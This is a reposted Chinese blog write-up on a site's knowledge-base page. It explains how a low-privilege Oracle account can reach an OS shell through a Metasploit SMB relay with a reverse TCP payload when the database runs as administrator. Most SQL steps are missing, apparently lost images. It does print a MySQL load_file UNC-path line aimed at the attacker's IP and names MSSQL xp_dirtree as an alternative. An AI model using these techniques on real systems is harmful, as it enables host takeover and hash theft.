主页 > 知识库 > Oracle 低权限数据库账户得到 OS 访问权限 提权利用

Oracle 低权限数据库账户得到 OS 访问权限 提权利用

热门标签:服务外包 Linux服务器 地方门户网站 网站排名优化 AI电销 百度竞价排名 呼叫中心市场需求 铁路电话系统

这几天看了篇叫"Penetration: from application down to OS (Oracle)"的文档,感觉挺有意思的,文档的 大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问权限。我本地测试了下,还真的成功了。:-)

具体的原理分析看原文吧,我这里把我的测试过程写出来.

我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0,服务启动权限为 administrator,数据库账户用的是 dbsnmp 账户的默认权限.0

1.先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo /etc/init.d/samba stopp>1

2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.

2

3

3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect和 resource 权限。

4.然后执行下面 3 条 SQL 语句

 

5

6

7

后来经过 pt007 的提醒,我又测试了 mysql,如果服务也是 administrator 启动的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系统权限的.MSSQL 应该用 xp_dirtree 存储过程 也是可以的,不过我没有配置出来用 administrator 账户启动 MSSQL 服务,希望知道的朋友指点下我。

这个技术可以用到内网 WEB 评估的时候,如果有注入,服务又是 administrator 启动的,可以提权了。

两个PDF下载,

作者:Mickey
http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Oracle%20database).pdf
http://54mickey.googlepages.com/Penetration_fromapplication_down_to_.pdf

当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系 统当前服务用户的 half lm 哈希和 cmdshell 了。

您可能感兴趣的文章:
  • Javascript中的几种继承方式对比分析
  • 浅析2种JavaScript继承方式
  • Javascript编程中几种继承方式比较分析
  • JavaScript中的继承方式详解
  • javascript学习笔记(九)javascript中的原型(prototype)及原型链的继承方式
  • JavaScript继承方式实例
  • Linux下SVN服务器同时支持Apache的http和svnserve独立服务器两种模式且使用相同的访问权限账号
  • 深入解析yii权限分级式访问控制的实现(非RBAC法)
  • Oracle 10g各个帐号的访问权限、登录路径、监控状态命令查询等等
  • 127.0.0.1无法访问,没有权限: GetObject
  • 使用Cacls命令设置服务器文件访问权限
  • C++ 的三种访问权限与三种继承方式

标签:仙桃 衡水 湖南 铜川 黄山 崇左 兰州 湘潭

巨人网络通讯声明:本文标题《Oracle 低权限数据库账户得到 OS 访问权限 提权利用》,本文关键词  ;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 收缩
    • 微信客服
    • 微信二维码
    • 电话咨询

    • 400-1100-266